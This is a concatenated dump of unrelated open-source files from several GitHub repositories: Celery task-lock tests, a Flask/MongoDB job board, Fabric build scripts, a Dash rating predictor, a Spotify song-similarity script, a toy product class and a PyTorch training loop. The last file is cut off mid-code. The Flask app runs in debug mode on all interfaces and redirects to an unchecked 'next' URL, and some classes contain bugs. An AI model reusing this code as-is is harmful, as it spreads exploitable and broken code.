``` |
{
"source": "joshfinnie/celery-once",
"score": 2
} |
#### File: tests/integration/test_integration.py
```python
from celery import Celery
from celery_once import QueueOnce, AlreadyQueued
from freezegun import freeze_time
import pytest
app = Celery()
app.conf.ONCE_REDIS_URL = 'redis://localhost:1337/0'
app.conf.ONCE_DEFAULT_TIMEOUT = 30 * 60
app.conf.CELERY_ALWAYS_EAGER = True
@app.task(name="example", base=QueueOnce, once={'keys': ['a']})
def example(redis, a=1):
return redis.get("qo_example_a-1")
def test_delay_1(redis):
result = example.delay(redis)
assert result.get() is not None
redis.get("qo_example_a-1") is None
def test_delay_2(redis):
redis.set("qo_example_a-1", 10000000000)
try:
example.delay(redis)
pytest.fail("Didn't raise AlreadyQueued.")
except AlreadyQueued:
pass
@freeze_time("2012-01-14") # 1326499200
def test_delay_3(redis):
redis.set("qo_example_a-1", 1326499200 - 60 * 60)
example.delay(redis)
def test_apply_async_1(redis):
result = example.apply_async(args=(redis, ))
assert result.get() is not None
redis.get("qo_example_a-1") is None
def test_apply_async_2(redis):
redis.set("qo_example_a-1", 10000000000)
try:
example.apply_async(args=(redis, ))
pytest.fail("Didn't raise AlreadyQueued.")
except AlreadyQueued:
pass
def test_apply_async_3(redis):
redis.set("qo_example_a-1", 10000000000)
result = example.apply_async(args=(redis, ), once={'graceful': True})
assert result is None
@freeze_time("2012-01-14") # 1326499200
def test_apply_async_4(redis):
redis.set("qo_example_a-1", 1326499200 - 60 * 60)
example.apply_async(args=(redis, ))
def test_redis():
assert example.redis.connection_pool.connection_kwargs['host'] == "localhost"
assert example.redis.connection_pool.connection_kwargs['port'] == 1337
assert example.redis.connection_pool.connection_kwargs['db'] == 0
def test_default_timeout():
assert example.default_timeout == 30 * 60
```
#### File: tests/unit/test_task.py
```python
from celery import task
from celery_once.tasks import QueueOnce, AlreadyQueued
from freezegun import freeze_time
import pytest
@task(name='simple_example', base=QueueOnce)
def simple_example():
return "simple"
@task(name='args_example', base=QueueOnce)
def args_example(a, b):
return a + b
@task(name='select_args_example', base=QueueOnce, once={'keys': ['a']})
def select_args_example(a, b):
return a + b
def test_get_key_simple():
assert "qo_simple_example" == simple_example.get_key()
def test_get_key_args_1():
assert "qo_args_example_a-1_b-2" == args_example.get_key(kwargs={'a':1, 'b': 2})
def test_get_key_args_2():
assert "qo_args_example_a-1_b-2" == args_example.get_key(args=(1, 2, ))
def test_get_key_select_args_1():
assert "qo_select_args_example_a-1" == select_args_example.get_key(kwargs={'a':1, 'b': 2})
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock(redis):
assert redis.get("test") is None
QueueOnce().raise_or_lock(key="test", expires=60)
assert redis.get("test") is not None
assert redis.ttl("test") == 60
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock_locked(redis):
# Set to expire in 30 seconds!
redis.set("test", 1326499200 + 30)
with pytest.raises(AlreadyQueued) as e:
QueueOnce().raise_or_lock(key="test", expires=60)
assert e.value.countdown == 30
assert e.value.message == "Expires in 30 seconds"
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock_locked_and_expired(redis):
# Set to have expired 30 ago seconds!
redis.set("test", 1326499200 - 30)
QueueOnce().raise_or_lock(key="test", expires=60)
assert redis.get("test") is not None
assert redis.ttl("test") == 60
def test_clear_lock(redis):
redis.set("test", 1326499200 + 30)
QueueOnce().clear_lock("test")
assert redis.get("test") is None
``` |
{
"source": "joshfinnie/Flask-Job-Board",
"score": 2
} |
#### File: Flask-Job-Board/flask-job-board/app.py
```python
import os
from datetime import datetime
from urlparse import urlparse
from flask import Flask, render_template, request, redirect, url_for, flash, session
from flaskext.seasurf import SeaSurf
from flaskext.bcrypt import Bcrypt
from flaskext.gravatar import Gravatar
from functools import wraps
import settings
from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField
app = Flask(__name__)
app.config.from_object(settings)
csrf = SeaSurf(app)
bcrypt = Bcrypt(app)
gravatar = Gravatar(app, size=160, default='mm')
database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board'))
connect(database.path[1:],
host=database.hostname,
port=database.port,
username=database.username,
password=<PASSWORD>)
class User(Document):
username = StringField(required=True)
email = EmailField(required=True)
first_name = StringField(max_length=50)
last_name = StringField(max_length=50)
location = StringField()
homepage = StringField()
passhash = StringField()
created = DateTimeField()
meta = {
'ordering': ['-created']
}
class Job(Document):
company_name = StringField(required=True)
company_location = StringField(required=True)
company_url = URLField(required=True)
job_title = StringField(required=True)
job_posting = StringField(required=True)
application_instructions = StringField(required=True)
created = DateTimeField()
meta = {
'ordering': ['-created']
}
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("logged_in"):
return f(*args, **kwargs)
else:
flash(u'Login is required.', 'warning')
return redirect(url_for('login', next=request.url))
return decorated_function
@app.template_filter()
def timesince(dt, default="just now"):
"""
Returns string representing "time since" e.g.
3 days ago, 5 hours ago etc.
"""
now = datetime.utcnow()
diff = now - dt
periods = (
(diff.days / 365, "year", "years"),
(diff.days / 30, "month", "months"),
(diff.days / 7, "week", "weeks"),
(diff.days, "day", "days"),
(diff.seconds / 3600, "hour", "hours"),
(diff.seconds / 60, "minute", "minutes"),
(diff.seconds, "second", "seconds"),
)
for period, singular, plural in periods:
if period:
return "%d %s ago" % (period, singular if period == 1 else plural)
return default
@app.route("/")
def home():
jobs = Job.objects.all()
return render_template('home.html', jobs=jobs)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/contact')
def contact():
return render_template('contact.html')
@app.route('/create', methods=['GET', 'POST'])
@login_required
def create_job():
if request.method == 'POST':
job = Job(company_name=request.form['company_name'])
job.company_location=request.form['company_location']
company_url=request.form['company_url']
if company_url[:4] == 'http':
job.company_url=company_url
else:
job.company_url='http://'+company_url
job.job_title=request.form['job_title']
job.job_posting=request.form['job_posting']
job.application_instructions=request.form['application_instructions']
job.created=datetime.utcnow()
job.save()
next_url = job.id
flash(u'Job successfully created.', 'success')
return redirect(url_for('show_job', job_id=next_url))
else:
return render_template('create_job.html')
@app.route('/signup', methods=['GET', 'POST'])
def signin():
if request.method == 'POST':
if request.form['password'] == request.form['password2']:
user = User(username=request.form['username'])
user.email=request.form['email']
user.first_name=request.form['first_name']
user.last_name=request.form['last_name']
user.location='None'
user.passhash=<PASSWORD>.generate_password_hash(request.form['password'])
user.homepage='None'
user.created=datetime.utcnow()
user.save()
user_id=user.id
session['username'] = user.username
session['logged_in'] = True
flash(u'Successfully created new user.', 'success')
return redirect(url_for('show_user', user_id=user_id))
else:
flash(u'Passwords do not match.', 'error')
return render_template('create_user.html')
else:
return render_template('create_user.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
next = request.values.get('next', '')
if request.method == 'POST':
try:
user = User.objects.get(username=request.form['username'])
except User.DoesNotExist:
flash(u'Password or Username is incorrect.', 'error')
return render_template('login.html')
else:
if not bcrypt.check_password_hash(user.passhash, request.form['password']):
flash(u'Password or Username is incorrect.', 'error')
return render_template('login.html')
else:
session['username'] = user.username
session['logged_in'] = True
flash(u'You have been successfully logged in.', 'success')
return redirect(next or url_for('home'))
return render_template('login.html')
@app.route('/logout')
def logout():
session.pop('username', None)
session.pop('logged_in', None)
flash(u'You have been successfully logged out.', 'info')
return redirect(url_for('home'))
@app.route('/settings', methods=['GET', 'POST'])
@login_required
def settings():
if request.method == 'POST':
user=User.objects.get(username=session.get('username'))
user.email=request.form['email']
user.first_name=request.form['first_name']
user.last_name=request.form['last_name']
user.location=request.form['location']
user.homepage=request.form['homepage']
user.save()
user_id=user.id
flash(u'Profile was successfully updated.', 'success')
return redirect(url_for('show_user', user_id=user_id))
else:
user=User.objects.get(username=session.get('username'))
return render_template('settings.html', user=user)
@app.route('/user/<user_id>')
def show_user(user_id):
user = User.objects.with_id(user_id)
return render_template('show_user.html', user=user)
@app.route('/job/<job_id>')
def show_job(job_id):
job = Job.objects.with_id(job_id)
return render_template('show_job.html', job=job)
@app.route('/users')
def show_all_users():
users = User.objects.all()
return render_template('show_all_users.html', users=users)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.debug = True
app.run(host='0.0.0.0', port=port)
``` |
{
"source": "joshfinnie/p.jfin.us",
"score": 2
} |
#### File: joshfinnie/p.jfin.us/fabfile.py
```python
from fabric.api import *
import fabric.contrib.project as project
import os
import sys
import SimpleHTTPServer
import SocketServer
def clean():
if os.path.isdir(DEPLOY_PATH):
local('rm -rf {deploy_path}'.format(**env))
local('mkdir {deploy_path}'.format(**env))
def build():
local('pelican -s pelicanconf.py')
def rebuild():
clean()
build()
def regenerate():
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
build()
serve()
def preview():
local('pelican -s publishconf.py')
``` |
{
"source": "joshfire/joshfire-framework",
"score": 3
} |
#### File: examples/rss4/fabfile.py
```python
from fabric.api import *
import os
import sys
sys.path.append("../../build")
from joshfabric import *
def export():
local("rm -rf export/")
local("mkdir -p export/")
for f in ["public", "src", "joshfire"]:
local("cp -RL %s export/" % f)
def phonegap():
"EXPORT: export app to phonegap"
export()
if not os.path.isdir("phonegap"):
print "Your phonegap project must be in phonegap/ ; We'll replace the phonegap/www/ directory"
sys.exit(1)
local("rm -rf phonegap/www/* && mkdir -p phonegap/www/")
local("cp -R export/* phonegap/www/")
switchfile = """<html>
<head>
<style>
html,body { background-color:black; }
</style>
</head>
<body>
<script>
window.location = "public/index.ios.html";
</script>
</body>
</html>
"""
f = open("phonegap/www/index.html", "w")
f.write(switchfile)
f.close()
```
#### File: joshfire/joshfire-framework/fabfile.py
```python
from fabric.api import *
import fabric.colors
import os
import re
import sys
import datetime
sys.path.append("build")
from joshfabric import *
try:
import json
except:
import simplejson as json
"""
Bootstrap generation
"""
def bootstraps():
"""
Builds bootstrap files for each adapter
"""
requirejs = open("lib/vendor/require.js").read()
# requirejs_node = open("lib/vendor/require.node.js").read()
namespace = open("lib/global.js").read()
adapters = os.listdir("lib/adapters/")
def listSources(adapterpath):
sources = []
for (path, dirs, files) in os.walk("lib/adapters/%s/" % adapterpath):
for f in files:
if re.match('.*\.js$', f):
sources += [os.path.join(path.replace("lib/adapters/%s/" % adapterpath, ""), f)[0:-3]]
sources.remove("global")
try:
sources.remove("bootstrap")
except:
pass
return sources
for c in adapters:
# skip useless directories
if(re.match('\.DS_Store', c)):
continue
sources = {}
namespace_adapter = open("lib/adapters/%s/global.js" % c).read()
# todo replace by some jseval().
adapter_deps = re.search(
"J(oshfire)?\.adapterDeps\s*\=\s*([^\;]+)\;", namespace_adapter)
deps = [c]
if adapter_deps:
deps += json.loads(adapter_deps.group(2).replace("'", '"'))
for d in deps:
sources[d] = listSources(d)
patched_namespace = namespace
patched_namespace = patched_namespace.replace(
"JOSHFIRE_REPLACEME_ADAPTER_MODULES", json.dumps(sources))
patched_namespace = patched_namespace.replace(
"JOSHFIRE_REPLACEME_ADAPTER_ID", json.dumps(c))
bootstrap = __getCopyrightHeader() + "\n\n"
if c == "node":
print "We no longer handle node adapter"
# bootstrap += patched_namespace + namespace_adapter + requirejs + requirejs_node + open("lib/adapters/%s/global.exec.js" % c).read()
# patch needed in require.js
# bootstrap = bootstrap.replace("var require, define;", "")
else:
bootstrap += requirejs + patched_namespace + namespace_adapter
print "Writing %s ..." % ("lib/adapters/%s/bootstrap.js" % c)
open("lib/adapters/%s/bootstrap.js" % c, "w").write(bootstrap)
open("lib/adapters/%s/modules.json" % c, "w").write(
json.dumps(sources))
def _getFinalTarGzName():
package = json.load(open("package.json", "r"))
version = package["version"]
finalname = "joshfire-framework-%s.tar.gz" % version
return finalname
# release
def targz():
finalname = _getFinalTarGzName()
local("rm -rf export/")
local("mkdir -p export/")
local("git archive --format=tar -o export/a.tar HEAD")
local("cd export && tar xvf a.tar && rm a.tar")
# fix some files
local("rm export/lib/uielements/forminput.js")
# include optimized builds in examples
optimizeexamples()
local("cp -R examples/videolist/export export/examples/videolist/")
local("cd export && tar czvf %s *" % finalname)
return finalname
def prod():
env.hosts = ['joshfire.com']
env.path = '/home/mikiane/joshfiredocs'
env.user = 'mikiane'
def targzup():
targz()
finalname = _getFinalTarGzName()
run("mkdir -p %s/shared/downloads/" % env.path)
put('export/%s' % finalname, '%s/shared/downloads/%s' % (env.path,
finalname))
"""
Code quality checking
"""
def jslint(files=0):
"""
Checks js files using JSLint
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
# output = local("jslint -nologo -conf build/jsl.conf -process %s"
# % file, True)
output = local("jslint %s" % file, True)
if output.endswith("No errors found.") == True:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output[output.find("\n"):]
def jshint(files=0):
"""
Checks js files using JSHint
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("jshint %s" % file, True)
if output.endswith("OK!") == True:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output
def gjslint(files=0):
"""
Checks js files using gjslint for compliance with Google coding style
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("gjslint --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True)
offset = output.find("\nSome of the errors")
if offset == -1:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output[output.find("\n"):offset]
def optimizeexamples():
local("cd examples/videolist/ && fab optimize")
"""
Reindent & apply Google coding style
"""
"""
Generate API documentation
"""
def jsdoc(files=0):
files = files.split(" ") if not files == 0 else list_js_files(dirs=["lib"])
export = "doc/content/api"
local("rm -rf ./%s/*" % export)
local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -c=build/jsdoc-toolkit/jsdoc.conf -d=%s -t=build/jsdoc-toolkit/templates/jsdoc-tably-joshfire %s" % (export, " ".join(files)))
"""
local("wkhtmltopdf %s/*.html %s/symbols/*.html %s/JoshfireApiReference.pdf", (export, export, export))
local("rm -rf doc/lib/jsdoc/*")
local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -t=build/jsdoc-toolkit/templates/jsdoc-rst -c=build/jsdoc-toolkit/jsdoc.conf -d=doc/jsdoc-html %s" % " ".join(files))
"""
def pdfdoc():
print "www-joshfire must be running on localhost:40009 !"
doc_content = list_js_files(
dirs=["doc/content/"], excluded_dirs="api", extension=".html")
requests = ["http://localhost:40009/doc/dev/%s" % re.sub(
"(index)?\.html$", "", x[13:]) for x in doc_content]
os.system("rm -rf doc/export/pdfdoc/")
os.system("mkdir -p doc/export/pdfdoc/")
output_files = []
for r in requests:
output_files.append("doc/export/pdfdoc/%sx.html" % r[31:])
os.system("mkdir -p %s" % (os.path.dirname(output_files[-1])))
os.system("curl %s -o %s" % (r, output_files[-1]))
os.system("wkhtmltopdf %s doc/export/pdfdoc/JoshfireDoc.pdf" % (
" ".join(output_files)))
def fix(files=0):
"""
Alias on fixjsstyle
"""
fixjsstyle(files)
def fixjsstyle(files=0):
"""
Fix js files using fixjsstyle to comply with Google coding style
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("fixjsstyle --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True)
if output == "":
print fabric.colors.white("CLEAN ", True) + file
else:
print fabric.colors.green("FIXED ", True) + file
print output
# ugly patch to indent properly JSDoc com since fixjsstyle does not
file = open(file, "r+")
lines = file.readlines()
idx = 0
while idx < len(lines):
if lines[idx].strip()[0:2] == '/*':
level = lines[idx].find('/*')
idx += 1
while idx < len(lines):
lines[idx] = " " * level + lines[idx].strip() + "\n"
if lines[idx].find('*/') != -1:
break
idx += 1
idx += 1
file.seek(0)
file.truncate()
file.write("".join(lines))
file.close()
def preparerelease():
optimizeexamples()
jsdoc()
fixjsstyle()
fixjsstyle()
copyright()
bootstraps()
# todo tests once more
def copyright(files=0):
"""
Add copyright header to source files
"""
header = __getCopyrightHeader().split("\n") + ['', '']
# Add
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
name = file
buf = open(file, "r").read()
f = open(file, "w")
f.write("\n".join(header))
f.write(
re.compile("^\s*((\/\*\!(.*?)\*\/)\s*)*", re.DOTALL).sub("", buf))
f.close()
print fabric.colors.green("COPYRIGHTED ", True) + name
def __getCopyrightHeader():
"""
Add copyright header to source files
"""
# Get framework version
file = open('package.json', 'r')
version = json.loads(file.read())['version']
file.close()
# Get header template
file = open('build/LICENSE.HEADER', 'r')
header = file.read()
file.close
now = datetime.datetime.now()
header = header.replace('$VERSION', version).replace(
'$YEAR', str(now.year)).replace('$DATE', now.ctime())
return header
``` |
{
"source": "JoshFowlkes/amazon-ratings-dash-app",
"score": 3
} |
#### File: amazon-ratings-dash-app/pages/predictions.py
```python
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from joblib import load
from sklearn.impute import SimpleImputer
from app import app
pipeline = load('pages/pipeline.joblib')
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Below is a number of Sliders that affect the outcomes of our predicitive modeling.
Price
"""
),
dcc.Slider(
id='price',
min=0,
max=250,
step=1,
value=20,
marks={n: str(n) for n in range(0,250,25)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number of Available Stock
"""
),
dcc.Slider(
id='number_available_in_stock',
min=0,
max=95,
step=1,
value=20,
marks={n: str(n) for n in range(0,95,10)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number of Reviews
"""
),
dcc.Slider(
id='number_of_reviews',
min=0,
max=1400,
step=1,
value=20,
marks={n: str(n) for n in range(0,1400,100)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number of Answered Questions
"""
),
dcc.Slider(
id='number_of_answered_questions',
min=0,
max=40,
step=1,
value=20,
marks={n: str(n) for n in range(0,40,5)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Description?(1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_description',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Customer Written Reviews?(1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_customer_reviews',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Seller Answers Customer Questions?(1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_customer_questions_and_answers',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Product Information Section?(1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_product_information',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
],
md=5,
)
column2 = dbc.Col(
[
html.H2('Predicated Rating', className='mb-5'),
html.Div(id='prediction-content', className='lead'),
html.Img(src='assets/pdp3.png', className='img-fluid'),
dcc.Markdown(
"""
Important note, majority of the adjustable parameters listed on the left generally operate in a range and outside of that range the results tend to get
more unreliable. For example, illustrated in the graph above, majority of the items in the dataset used in this predictive model were $50 or less.
Thus this predictive model is most accurate for items around that price area. However, within the dataset there were a few items that were priced
much higher, one for instance had a price over $2400. This applies for all the adjustable inputs to the left. The parameters are already preset to only
allow parameter values close to the model's optimal range, however there is a enough wiggle room that outliers on either end will affect accuracy in the prediction.
"""
)
],
)
layout = dbc.Row([column1, column2])
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[Input('price', 'value'),
Input('number_available_in_stock', 'value'),
Input('number_of_reviews', 'value'),
Input('number_of_answered_questions', 'value'),
Input('new_description', 'value'),
Input('new_customer_reviews', 'value'),
Input('new_customer_questions_and_answers', 'value'),
Input('new_product_information', 'value')],
)
def predict(price,
number_available_in_stock,
number_of_reviews,
number_of_answered_questions,
new_description,
new_customer_reviews,
new_customer_questions_and_answers,
new_product_information):
y_pred = pipeline.predict([[price,
number_available_in_stock,
number_of_reviews,
number_of_answered_questions,
new_description,
new_customer_reviews,
new_customer_questions_and_answers,
new_product_information]])
estimate = y_pred[0]
return f'{estimate:.2f}/5 Star Rated Product'
``` |
{
"source": "JoshFowlkes/Data-science",
"score": 3
} |
#### File: JoshFowlkes/Data-science/SpotifyProjectFirstModel.py
```python
import os
try:
os.chdir(os.path.join(os.getcwd(), 'SpotifyProject'))
print(os.getcwd())
except:
pass
#%%
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KDTree
#%%
df = pd.read_csv('SpotifyAudioFeaturesApril2019 copy.csv')
#%%
df.head()
#%%
# Now to Make a Function to sum all this up and try different clustering models
def find_nearest_songs(df):
# remove categoricals
df_numerics = df.drop(columns=['track_id', 'track_name', 'artist_name'])
# Scale Data To Cluster More Accurately, and fit clustering model
df_scaled = StandardScaler().fit_transform(df_numerics)
df_modeled = KDTree(df_scaled)
# Querying the model for the 15 Nearest Neighbors
dist, ind = df_modeled.query(df_scaled, k=16)
# Putting the Results into a Dataframe
dist_df = pd.DataFrame(dist)
# Calculating the Distances
scores = (1 - ((dist - dist.min()) / (dist.max() - dist.min()))) * 100
# Creating A New Dataframe for the Distances
columns = ['Searched_Song', 'Nearest_Song1', 'Nearest_Song2', 'Nearest_Song3', 'Nearest_Song4',
'Nearest_Song5', 'Nearest_Song6', 'Nearest_Song7', 'Nearest_Song8', 'Nearest_Song9',
'Nearest_Song10', 'Nearest_Song11', 'Nearest_Song12', 'Nearest_Song13', 'Nearest_Song14',
'Nearest_Song15']
dist_score = pd.DataFrame(scores.tolist(), columns = columns)
# An Array of all indices of the nearest neighbors
ind[:16]
# Making an array of the Track IDs
song_ids = np.array(df.track_id)
# A function that creates list of the each song with its nearest neighbors
def find_similars(song_ids, ind):
similars = []
for row in ind:
ids = [song_ids[i] for i in row]
similars.append(ids)
return similars
# using the above function
nearest_neighbors = find_similars(song_ids, ind)
# putting the results into a dataframe
nearest_neighbors_df = pd.DataFrame(nearest_neighbors, columns=columns)
return nearest_neighbors_df
#%%
# this takes a good two to three minutes to process
find_nearest_songs(df)
#%%
# From here, if we add both the new dataframe and the original into an SQL database, we can easily
# just run JOIN ON queries to match the song Id's with track_name, artist, and any other info we'd want to display
``` |
{
"source": "JoshFowlkes/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
} |
#### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme.py
```python
import random
""" Making The Product Class as outlined in Instructions """
class Product:
def __init__(self, name, price=10, weight=20, flammability=.5):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
self.identifier = random.randint(100000, 999999)
""" Making the Stealability Function """
def stealability(self):
steal_ratio = self.price / self.weight
if (steal_ratio < .05):
return 'Not so stealable'
elif (steal_ratio >= .5) and (steal_ratio < 1.0):
return 'Kinda stealable'
else:
return 'Very Stealable!'
""" Making the Explode Function """
def explode(self):
explode_ratio = self.flammability * self.weight
if (explode_ratio < 10):
return '...fizzle.'
elif (explode_ratio >= 10) and (explode_ratio < 50):
return '...boom!'
else:
return 'BABOOOOM BABAY!!!!'
### part 3
""" Making the BoxingGlove Subclass of Product """
class BoxingGlove(Product):
def __init__(self, name):
super.__init__(name, weight=10)
def explode(self):
return "...it's a glove."
""" Making the Punch Function """
def punch(self):
if (self.weight < 5):
return 'That tickles.'
elif (self.weight >= 5) and (self.weight < 15):
return 'Hey that hurt!'
else:
return 'OUCH!'
```
#### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme_report.py
```python
from random import randint, sample, uniform
from acme import Product
""" Making lists of adjectives and nouns to be used as names """
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
""" Generate Products functions """
def generate_products(num_products=30):
products = []
""" Making a for loop to make each individual product """
for _ in range(num_products):
name = ADJECTIVES[randint(0,len(ADJECTIVES)-1)] + \
' ' + NOUNS[randint(0, len(NOUNS)-1)]
price = randint(5, 100)
weight = randint(5, 100)
flammability = uniform(0.0, 2.5)
prod = Product(name=name, price=price, weight=weight,
flammability=flammability)
products.append(prod)
return products
""" Making inventory report function """
def inventory_report(products):
if not isinstance(products, list):
raise TypeError('`products` - parameter passed must be a list')
n_prod = len(products)
if n_prod < 1 or (products is None):
return ValueError("`products` - parameter must be a non-empty list.")
tot_price, tot_wt, tot_flm = 0, 0, 0
for product in products:
tot_price += product.price
tot_wt += product.weight
tot_flm += product.flammability
avg_price = tot_price / n_prod
avg_wt = tot_wt / n_prod
avg_flm = tot_flm / n_prod
print("ACME CORPORATION OFFICIAL INVENTORY REPORT")
print("Unique product names:", len(set(products)))
print("Average price:", avg_price)
print("Average weight:", avg_wt)
print("Average flammability:", avg_flm)
if __name__ == '__main__':
inventory_report(generate_products())
``` |
{
"source": "joshfp/onfire",
"score": 2
} |
#### File: onfire/colab/runners.py
```python
import torch
from torch.optim import Adam
from torch.optim.lr_scheduler import OneCycleLR
from fastprogress.fastprogress import master_bar, progress_bar
from collections import defaultdict
import inspect
import matplotlib.pyplot as plt
from onfire.utils import batch_to_device
all = [
'SupervisedRunner',
]
class SupervisedRunner:
def __init__(self, model, loss_fn):
self.model = model
self.loss_fn = loss_fn
def fit(self, train_dl, valid_dl, epochs, lr, metrics=None, optimizer=None, scheduler=None):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(device)
optimizer = optimizer or Adam(self.model.parameters(), lr)
if scheduler != False:
scheduler = scheduler or OneCycleLR(optimizer, lr, epochs * len(train_dl))
else:
scheduler = None
self.train_stats = TrainTracker(metrics, validate=(valid_dl is not None))
bar = master_bar(range(epochs))
bar.write(self.train_stats.metrics_names, table=True)
for epoch in bar:
self.model.train()
for batch in progress_bar(train_dl, parent=bar):
batch = batch_to_device(batch, device)
loss = self._train_batch(batch, optimizer, scheduler)
loss.backward()
optimizer.step()
optimizer.zero_grad()
if scheduler:
scheduler.step()
self.train_stats.update_train_loss(loss)
valid_outputs = []
if valid_dl:
self.model.eval()
for batch in progress_bar(valid_dl, parent=bar):
batch = batch_to_device(batch, device)
output = self._valid_batch(batch)
valid_outputs.append(output)
self.train_stats.log_epoch_results(valid_outputs)
bar.write(self.train_stats.get_metrics_values(), table=True)
def predict(self, dl, include_target=False):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(device)
self.model.eval()
preds, ys = [], []
for batch in progress_bar(dl):
batch = batch_to_device(batch, device)
pred, y = self._predict_batch(batch, include_target)
preds.append(pred)
ys.append(y)
preds = torch.cat(preds)
return (preds, torch.cat(ys)) if include_target else preds
def _train_batch(self, batch, optimizer, scheduler):
*xb, yb = batch
output = self.model(*xb)
return self.loss_fn(output, yb)
def _valid_batch(self, batch):
*xb, yb = batch
with torch.no_grad():
output = self.model(*xb)
loss = self.loss_fn(output, yb)
return {'loss': loss.item(), 'y_true': yb.cpu(), 'y_pred': output.cpu()}
def _predict_batch(self, batch, include_target):
xb = batch[:-1] if len(batch) > 1 else [batch[0]]
yb = batch[-1].cpu() if include_target and len(batch) > 1 else None
with torch.no_grad():
output = self.model(*xb)
return output.cpu(), yb
class TrainTracker:
def __init__(self, metrics, validate):
if validate:
self.valid_loss = []
metrics = metrics if isinstance(metrics, (list, tuple)) else [metrics]
self.metrics = [Metric(metric_fn) for metric_fn in metrics if metric_fn]
self.train_smooth_loss = ExponentialMovingAverage()
self.train_loss = []
self.epoch = 0
self.validate = validate
@property
def metrics_names(self):
default_metrics = ['epoch', 'train_loss']
metrics = []
if self.validate:
metrics.append('valid_loss')
metrics.extend([metric.name for metric in self.metrics])
return default_metrics + metrics
def update_train_loss(self, loss):
self.train_smooth_loss.update(loss.item())
def log_epoch_results(self, valid_output):
self.epoch = self.epoch + 1
self.train_loss.append(self.train_smooth_loss.value)
if self.validate:
valid_output = self._process_valid_output(valid_output)
valid_loss = valid_output['loss'].mean().item()
for metric in self.metrics:
metric.update(**valid_output)
self.valid_loss.append(valid_loss)
def get_metrics_values(self, decimals=5):
default_metrics = [self.epoch, self.train_loss[-1]]
metrics = []
if self.validate:
metrics.append(self.valid_loss[-1])
metrics.extend([metric.value for metric in self.metrics])
res = default_metrics + metrics
return [str(x) if isinstance(x, int) else str(round(x, decimals)) for x in res]
def _process_valid_output(self, valid_output):
res = defaultdict(list)
for d in valid_output:
for k, v in d.items():
v = v if isinstance(v, torch.Tensor) else torch.tensor(v)
v = v if len(v.shape) else v.view(1)
res[k].append(v)
return {k: torch.cat(v) for k, v in res.items()}
def plot_loss(self):
fig, ax = plt.subplots()
ax.plot(self.train_loss, label='train')
ax.plot(self.valid_loss, label='valid')
ax.legend()
class ExponentialMovingAverage():
def __init__(self, beta=0.1):
self.beta = beta
self.initialized = False
def update(self, value):
if self.initialized:
self.mean = value * self.beta + self.mean * (1 - self.beta)
else:
self.mean = value
self.initialized = True
@property
def value(self):
return self.mean
class Metric:
def __init__(self, metric_fn):
self.metric_fn = metric_fn
self.name = metric_fn.__name__ if inspect.isfunction(metric_fn) else str(metric_fn)
self.value = None
def update(self, **kwargs):
